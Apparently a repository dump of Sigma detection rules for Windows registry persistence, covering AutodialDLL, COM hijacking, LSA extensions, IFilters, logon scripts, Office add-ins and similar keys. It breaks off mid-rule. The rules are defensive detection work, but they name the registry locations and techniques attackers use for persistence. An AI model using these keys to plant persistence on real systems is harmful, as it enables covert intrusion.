    "path": "rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml",
    "content": "title: Potential Persistence Via AutodialDLL\nid: e6fe26ee-d063-4f5b-b007-39e90aaf50e3\nstatus: test\ndescription: Detects changes to the \"AutodialDLL\" key, which could be used as a persistence method to load a custom DLL via the \"ws2_32\" library\nreferences:\n    - https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/\n    - https://persistence-info.github.io/Data/autodialdll.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-10\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\WinSock2\\Parameters\\AutodialDLL'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_chm.yml",
    "content": "title: Potential Persistence Via CHM Helper DLL\nid: 976dd1f2-a484-45ec-aa1d-0e87e882262b\nstatus: test\ndescription: Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence\nreferences:\n    - https://persistence-info.github.io/Data/htmlhelpauthor.html\n    - https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\HtmlHelp Author\\Location'\n            - '\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_builtin.yml",
    "content": "title: COM Object Hijacking Via Modification Of Default System CLSID Default Value\nid: 790317c0-0a36-4a6a-a105-6e576bf99a14\nrelated:\n    - id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77\n      type: obsolete\n    - id: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12\n      type: obsolete\nstatus: experimental\ndescription: Detects potential COM object hijacking via modification of default system CLSID.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)\n    - https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/\n    - https://blog.talosintelligence.com/uat-5647-romcom/\n    - https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques\n    - https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea\n    - https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis\n    - https://github.com/rtecCyberSec/BitlockMove\n    - https://cert.gov.ua/article/6284080\n    - https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-16\nmodified: 2025-11-10\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_target_root:\n        TargetObject|contains: '\\CLSID\\'\n        TargetObject|endswith:\n            - '\\InprocServer32\\(Default)'\n            - '\\LocalServer32\\(Default)'\n    selection_target_builtin_clsid:\n        TargetObject|contains:\n            # Note: Add other legitimate CLSID\n            - '\\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\\'\n            - '\\{2155fee3-2419-4373-b102-6843707eb41f}\\'\n            - '\\{4590f811-1d3a-11d0-891f-00aa004b2e24}\\'\n            - '\\{4de225bf-cf59-4cfc-85f7-68b90f185355}\\'\n            - '\\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}\\'\n            - '\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\'\n            - '\\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\\'\n            - '\\{7849596a-48ea-486e-8937-a2a3009f31a9}\\'\n            - '\\{0b91a74b-ad7c-4a9d-b563-29eef9167172}\\'\n            - '\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\'\n            - '\\{30D49246-D217-465F-B00B-AC9DDD652EB7}\\'\n            - '\\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\\'\n            - '\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\'\n            - '\\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\\'\n            - '\\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}\\'\n    selection_susp_location_1:\n        Details|contains:\n            # Note: Add more suspicious paths and locations\n            - ':\\Perflogs\\'\n            - '\\AppData\\Local\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - '\\System32\\spool\\drivers\\color\\' # as seen in the knotweed blog\n            - '\\Temporary Internet'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n            - '%appdata%'\n            - '%temp%'\n            - '%tmp%'\n    selection_susp_location_2:\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: all of selection_target_* and 1 of selection_susp_location_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml",
    "content": "title: Potential COM Object Hijacking Via TreatAs Subkey - Registry\nid: 9b0f8a61-91b2-464f-aceb-0527e0a45020\nstatus: test\ndescription: Detects COM object hijacking via TreatAs subkey\nreferences:\n    - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/\nauthor: Kutepov Anton, oscd.community\ndate: 2019-10-23\nmodified: 2025-10-26\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - 'HKU\\'\n            - 'Classes\\CLSID\\'\n            - '\\TreatAs'\n    filter_main_svchost:\n        # Example of target object by svchost\n        # TargetObject: HKU\\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\\CLSID\\{0003000A-0000-0000-C000-000000000046}\\TreatAs\n        Image: 'C:\\WINDOWS\\system32\\svchost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Maybe some system utilities in rare cases use linking keys for backward compatibility\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: COM hijacking via TreatAs\n      technique: T1546.015\n      atomic_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_comhijack_psfactorybuffer.yml",
    "content": "title: Potential PSFactoryBuffer COM Hijacking\nid: 243380fa-11eb-4141-af92-e14925e77c1b\nstatus: test\ndescription: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.\nreferences:\n    - https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine\n    - https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html\n    - https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection\n    - https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html\nauthor: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk\ndate: 2023-06-07\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)'\n    filter_main:\n        Details:\n            - '%windir%\\System32\\ActXPrxy.dll'\n            - 'C:\\Windows\\System32\\ActXPrxy.dll'\n    condition: selection and not filter_main\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml",
    "content": "title: Potential Persistence Via Custom Protocol Handler\nid: fdbf0b9d-0182-4c43-893b-a1eaab92d085\nstatus: test\ndescription: Detects potential persistence activity via the registration of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism.\nreferences:\n    - https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-30\nmodified: 2023-05-12\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|startswith: 'HKCR\\'\n        Details|startswith: 'URL:'\n    filter_main_ms_trusted:\n        Details|startswith: 'URL:ms-' # Microsoft Protocols usually start with \"ms-\"\n    filter_main_generic_locations:\n        Image|startswith: # Add more folders to avoid FP\n            - 'C:\\Program Files (x86)'\n            - 'C:\\Program Files\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    # Uncomment this section to add specific Protocol Handler names that are known\n    # filter_specific:\n    #     Details: 'URL:'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Many legitimate applications can register a new custom protocol handler. Additional filters need to be applied according to your environment.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_event_viewer_events_asp.yml",
    "content": "title: Potential Persistence Via Event Viewer Events.asp\nid: a1e11042-a74a-46e6-b07c-c4ce8ecc239b\nstatus: test\ndescription: Detects potential registry persistence via the Event Viewer \"Events.asp\" technique\nreferences:\n    - https://twitter.com/nas_bench/status/1626648985824788480\n    - https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks\n    - https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-17\nmodified: 2023-03-05\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        # Covers both \"\\Policies\\\" and \"\\Software\\\" paths for both \"Machine\" and \"User\" level configs\n        # Also \"MicrosoftRedirectionProgramCommandLineParameters\" key\n        TargetObject|contains:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram'\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL'\n    filter_default_redirect_program:\n        Image|endswith: 'C:\\WINDOWS\\system32\\svchost.exe' # Set via GPO\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram'\n        Details: '%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe'\n    filter_default_redirect_program_cli:\n        Image|endswith: 'C:\\WINDOWS\\system32\\svchost.exe' # Set via GPO\n        TargetObject|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters'\n        Details: '-url hcp://services/centers/support?topic=%%s'\n    filter_url:\n        Details: 'http://go.microsoft.com/fwlink/events.asp'\n    filter_cleaner:\n        Details: '(Empty)'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml",
    "content": "title: Potential Persistence Via GlobalFlags\nid: 36803969-5421-41ec-b92f-8500f79c23b0\nrelated:\n    - id: c81fe886-cac0-4913-a511-2822d72ff505\n      type: obsolete\nstatus: test\ndescription: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys\nreferences:\n    - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\n    - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/\nauthor: Karneades, Jonhnathan Ribeiro, Florian Roth\ndate: 2018-04-11\nmodified: 2023-06-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1546.012\n    - car.2013-01-002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_global_flag:\n        TargetObject|contains|all:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\'\n            - '\\Image File Execution Options\\'\n            - '\\GlobalFlag'\n    selection_silent_process:\n        TargetObject|contains|all:\n            - '\\Microsoft\\Windows NT\\CurrentVersion\\'\n            - '\\SilentProcessExit\\'\n        TargetObject|contains:\n            - '\\ReportingMode'\n            - '\\MonitorProcess'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_ie.yml",
    "content": "title: Modification of IE Registry Settings\nid: d88d0ab2-e696-4d40-a2ed-9790064e66b3\nstatus: test\ndescription: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert JavaScript for persistence\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry\nauthor: frack113\ndate: 2022-01-22\nmodified: 2025-10-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_domains:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings'\n    filter_main_dword:\n        Details|startswith: 'DWORD'\n    filter_main_null:\n        Details: null\n    filter_main_office:\n        Details:\n            - 'Cookie:'\n            - 'Visited:'\n            - '(Empty)'\n    filter_main_path:\n        TargetObject|contains:\n            - '\\Cache'\n            - '\\ZoneMap'\n            - '\\WpadDecision'\n    filter_main_binary:\n        Details: 'Binary Data'\n    filter_optional_accepted_documents:\n        # Spotted during Office installations\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Accepted Documents'\n    condition: selection_domains and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml",
    "content": "title: Register New IFilter For Persistence\nid: b23818c7-e575-4d13-8012-332075ec0a2b\nstatus: test\ndescription: |\n    Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.\n    You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.\nreferences:\n    - https://persistence-info.github.io/Data/ifilters.html\n    - https://twitter.com/0gtweet/status/1468548924600459267\n    - https://github.com/gtworek/PSBits/tree/master/IFilter\n    - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2024-03-26\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_ext:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Classes\\.'\n            - '\\PersistentHandler'\n    selection_clsid:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Classes\\CLSID'\n            - '\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}'\n    filter_default_targets:\n        TargetObject|contains:\n            # TODO: Add the default extension PersistentHandler.\n            # Note this could also offer a blindspot as the attacker could use one of these and hijack them\n            - '\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\' # Office Open XML Format PowerPoint Persistent Handler\n            - '\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\' # Office Open XML Format Excel Persistent Handler\n            - '\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\' # Office Open XML Format Word Persistent Handler\n            - '\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\' # Microsoft OneNote Windows Desktop Search IFilter Persistent handler\n            - '\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\' # Null persistent handler\n            - '\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\' # PDF Persistent Handler\n            - '\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\' # rtf persistent handler\n            - '\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\' # Open Document Format ODT Persistent Handler\n            - '\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\' # Zip Persistent Handler\n            - '\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\' # Open Document Format ODS Persistent Handler\n            - '\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\' # Related to MIME Filter\n            - '\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\' # Related to MIME Filter\n            - '\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\' # Setting Content File Persistent Handler\n            - '\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\' # Plain Text persistent handler\n            - '\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\' # Wordpad OOXML Document Filter\n            - '\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\' # XML File Persistent Handler\n            - '\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\' # .url File Persistent Handler\n            - '\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\' # html persistent handler for mapi email\n            - '\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\' # Microsoft Office Persistent Handler\n            - '\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\' # Wordpad ODT Document Filter\n            - '\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}\\' # Office Open XML Format Excel Persistent Handler\n            - '\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\' # App Content File Persistent Handler\n            - '\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\' # rtf persistent handler for mapi email\n            - '\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\' # text persistent handler for mapi email\n            - '\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\' # Open Document Format ODP Persistent Handler\n            - '\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\' # Microsoft OneNote Section persistent handler\n            - '\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}' # HTML File persistent handler\n            # - '\\CLSID\\{F6F00E65-9CAF-43BB-809A-38AA4621BCF2}' # XMind Persistent Handler (not present by default)\n            - '\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\' # Office Outlook MSG Persistent Handler\n    filter_generic_paths:\n        Image|startswith:\n            # Note: We assume if an attacker has access to one of these directories. Then he already has admin.\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate registration of IFilters by the OS or software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml",
    "content": "title: Potential Persistence Via Logon Scripts - Registry\nid: 9ace0707-b560-49b8-b6ca-5148b42f39fb\nstatus: test\ndescription: Detects creation of the \"UserInitMprLogonScript\" registry value, which can be used as a persistence method by malicious actors\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md\nauthor: Tom Ueltschi (@c_APT_ure)\ndate: 2019-01-12\nmodified: 2025-10-26\ntags:\n    - attack.privilege-escalation\n    - attack.t1037.001\n    - attack.persistence\n    - attack.lateral-movement\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'UserInitMprLogonScript'\n    condition: selection\nfalsepositives:\n    - Investigate the contents of the \"UserInitMprLogonScript\" value to determine if the added script is legitimate\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Logon Scripts\n      technique: T1037.001\n      atomic_guid: d6042746-07d4-4c92-9ad8-e644c114a231\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml",
    "content": "title: Potential Persistence Via LSA Extensions\nid: 41f6531d-af6e-4c6e-918f-b946f2b85a36\nstatus: test\ndescription: |\n    Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\n    The \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\nreferences:\n    - https://persistence-info.github.io/Data/lsaaextension.html\n    - https://twitter.com/0gtweet/status/1476286368385019906\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml",
    "content": "title: Potential Persistence Via Mpnotify\nid: 92772523-d9c1-4c93-9547-b0ca500baba3\nstatus: test\ndescription: Detects when an attacker registers a new SIP provider for persistence and defense evasion\nreferences:\n    - https://persistence-info.github.io/Data/mpnotify.html\n    - https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify'\n    condition: selection\nfalsepositives:\n    - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml",
    "content": "title: Potential Persistence Via MyComputer Registry Keys\nid: 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06\nstatus: test\ndescription: Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)\nreferences:\n    - https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-09\nmodified: 2024-01-11\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer'\n        TargetObject|endswith: '(Default)'\n    condition: selection\nfalsepositives:\n    - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml",
    "content": "title: Potential Persistence Via DLLPathOverride\nid: a1b1fd53-9c4a-444c-bae0-34a330fc7aa8\nstatus: test\ndescription: Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process\nreferences:\n    - https://persistence-info.github.io/Data/naturallanguage6.html\n    - https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_root:\n        # The path can be for multiple languages\n        # Example:  HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\English_UK\n        #           HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\English_US\n        #           HKLM\\System\\CurrentControlSet\\Control\\ContentIndex\\Language\\Neutral\n        TargetObject|contains: '\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\'\n    selection_values:\n        TargetObject|contains:\n            - '\\StemmerDLLPathOverride'\n            - '\\WBDLLPathOverride'\n            - '\\StemmerClass'\n            - '\\WBreakerClass'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml",
    "content": "title: Potential Persistence Via Visual Studio Tools for Office\nid: 9d15044a-7cfe-4d23-8085-6ebc11df7685\nstatus: test\ndescription: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.\nreferences:\n    - https://twitter.com/_vivami/status/1347925307643355138\n    - https://vanmieghem.io/stealth-outlook-persistence/\nauthor: Bhabesh Raj\ndate: 2021-01-10\nmodified: 2025-10-07\ntags:\n    - attack.t1137.006\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\Software\\Microsoft\\Office\\Outlook\\Addins\\'\n            - '\\Software\\Microsoft\\Office\\Word\\Addins\\'\n            - '\\Software\\Microsoft\\Office\\Excel\\Addins\\'\n            - '\\Software\\Microsoft\\Office\\Powerpoint\\Addins\\'\n            - '\\Software\\Microsoft\\VSTO\\Security\\Inclusion\\'\n    filter_main_system:\n        Image:\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\SysWOW64\\msiexec.exe'\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n            - 'C:\\Windows\\SysWOW64\\regsvr32.exe' # e.g. default Evernote installation\n    filter_main_office_click_to_run:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files (x86)\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_integrator:\n        Image:\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_main_office_apps:\n        Image|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\OFFICE'\n            - 'C:\\Program Files\\Microsoft Office\\Root\\OFFICE'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE'\n        Image|endswith:\n            - '\\excel.exe'\n            - '\\Integrator.exe'\n            - '\\outlook.exe'\n            - '\\powerpnt.exe'\n            - '\\Teams.exe'\n            - '\\visio.exe'\n            - '\\winword.exe'\n    filter_optional_avg:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt\\'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate Addin Installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml",
    "content": "title: Potential Persistence Via Outlook Home Page\nid: ddd171b5-2cc6-4975-9e78-f0eccd08cc76\nrelated:\n    - id: 487bb375-12ef-41f6-baae-c6a1572b4dd1\n      type: similar\nstatus: test\ndescription: |\n    Detects potential persistence activity via outlook home page.\n    An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70\n    - https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us\n    - https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change\nauthor: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand\ndate: 2021-06-09\nmodified: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - 